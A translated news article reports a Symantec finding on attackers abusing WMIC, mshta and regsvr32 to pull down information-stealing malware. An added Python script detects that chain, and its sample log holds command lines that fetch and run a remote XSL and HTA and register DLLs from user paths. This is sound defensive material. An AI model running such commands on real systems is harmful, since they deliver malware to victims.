Hackers abuse legitimate Windows tools to steal information


Attackers increasingly use legitimate tools or run simple scripts and shellcode directly in memory. These living-off-the-land tactics are less likely to be detected by traditional malware protection, Symantec warns.

By carrying out an attack with software and processes that are already present on the targeted computer, an attacker can operate unnoticed for a longer period of time. Because (almost) no new, unknown files are introduced to the system, the risk of detection is minimized.

A new attack uncovered by Symantec uses the legitimate WMIC tool in Windows (Windows Management Instrumentation Command-line) in combination with an eXtensible Stylesheet Language (XSL) file to download malware onto a system and then steal information.

WMIC is a legitimate utility that is present on all Windows machines. It is used for management tasks on both local and remote systems and can retrieve system settings, control processes and execute scripts.

The use of WMI by cybercriminals is not new. The tool is usually used for propagation, but in this case it is used to download a malicious file, the Symantec researchers say.

The attack

The attack starts with a phishing attempt in which the victim is tricked into clicking on a URL. Once clicked, a WMIC command is executed that downloads a malicious XSL file to the system. The file contains JavaScript that is executed via mshta.exe, a legitimate Windows process (the Microsoft HTML Application Host).

Up to this point, nothing overtly suspicious has happened on the system in question. The JavaScript, however, is far from innocent: it contains a list of 52 domains from which it generates a random download link for an HTML Application (HTA) file.

The HTA file then generates new dynamic URLs in the same way to download further files, including three DLLs and the main payload. The DLLs are registered using the legitimate regsvr32.exe.

The payload contains several modules for stealing information from the affected system. The HTA file can also be used to install additional modules, such as a password stealer, a keylogger and a backdoor.
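Because every stage of this chain runs a signed Windows binary, file-based scanning has little to go on; what does stand out is the way each binary is invoked. The script below is an added example written for this article, not code from Techzine or from Symantec's research. It applies three command-line heuristics (wmic.exe pulling a stylesheet from a URL, mshta.exe started with a remote location, regsvr32.exe registering a DLL from a user-writable path) to process-creation records. The pipe-separated record format, the rule names and the sample log lines are all constructed for the example; the placeholder domain is not a real indicator.

```python
"""Detect the WMIC -> mshta -> regsvr32 living-off-the-land chain in
process-creation logs. Added example; the log format below is an
assumption (parent image | image | command line), so map the fields onto
your own Sysmon Event ID 1 / Security 4688 / EDR telemetry."""
import re
from typing import NamedTuple


class ProcEvent(NamedTuple):
    parent: str    # image name of the parent process
    image: str     # image name of the created process
    cmdline: str   # full command line as logged


# Each rule: (image-name regex, command-line regex). Only the abuse pattern
# is flagged; the same binaries used normally should not match.
RULES = {
    # wmic.exe told to render its output through a stylesheet fetched over
    # HTTP(S). A built-in format name such as /format:list is normal.
    "wmic_remote_xsl": (r"wmic(\.exe)?", r"/format\s*:\s*\"?\s*https?://"),
    # mshta.exe started with a remote location instead of a local .hta file.
    "mshta_remote_hta": (r"mshta(\.exe)?", r"https?://"),
    # regsvr32.exe registering a DLL that lives under a user-writable path.
    "regsvr32_user_path_dll": (
        r"regsvr32(\.exe)?",
        r"\\(users|programdata|temp)\\[^\s\"]*\.dll",
    ),
}


def parse_line(line: str) -> ProcEvent:
    """Parse one 'parent|image|cmdline' record (constructed format)."""
    parent, image, cmdline = line.split("|", 2)
    return ProcEvent(parent.strip(), image.strip(), cmdline.strip())


def classify(event: ProcEvent) -> list[str]:
    """Return the names of all rules the event matches (empty if benign)."""
    hits = []
    for name, (image_re, cmd_re) in RULES.items():
        if re.fullmatch(image_re, event.image, re.IGNORECASE) and re.search(
            cmd_re, event.cmdline, re.IGNORECASE
        ):
            hits.append(name)
    return hits


def scan(log_text: str) -> dict[str, list[str]]:
    """Map each triggered rule name to the command lines that triggered it."""
    findings: dict[str, list[str]] = {}
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        event = parse_line(raw)
        for name in classify(event):
            findings.setdefault(name, []).append(event.cmdline)
    return findings


def chain_complete(findings: dict[str, list[str]]) -> bool:
    """True when all three stages described in the article were observed."""
    return set(RULES) <= set(findings)


# Constructed sample telemetry: three malicious stages mixed with two benign
# uses of the same tools. placeholder.invalid is a reserved, non-routable name.
SAMPLE_LOG = r"""
explorer.exe|wmic.exe|wmic os get /format:"https://placeholder.invalid/style.xsl"
wmic.exe|mshta.exe|mshta https://placeholder.invalid/app.hta
mshta.exe|regsvr32.exe|regsvr32 /s C:\Users\Public\Libraries\one.dll
mshta.exe|regsvr32.exe|regsvr32 /s C:\Users\alice\AppData\Roaming\two.dll
mshta.exe|regsvr32.exe|regsvr32 /s C:\ProgramData\Cache\three.dll
services.exe|wmic.exe|wmic os get caption,version /format:list
svchost.exe|regsvr32.exe|regsvr32 /s C:\Windows\System32\example.dll
"""

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for rule, cmds in found.items():
        for cmd in cmds:
            print(f"[{rule}] {cmd}")
    print("full chain observed:", chain_complete(found))
```

On the sample input the two benign lines (a local `/format:list` and a DLL under System32) produce no hits, while the five malicious lines trigger all three rules, so `chain_complete` reports the whole chain. In production you would additionally correlate on parent lineage (mshta.exe spawned by wmic.exe, regsvr32.exe spawned by mshta.exe), which the `parent` field is carried for.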

This news article was automatically translated from Dutch to give Techzine.eu a head start. All news articles after September 1, 2019 are written in native English and NOT translated. All our background stories are written in native English as well. For more information read our launch article.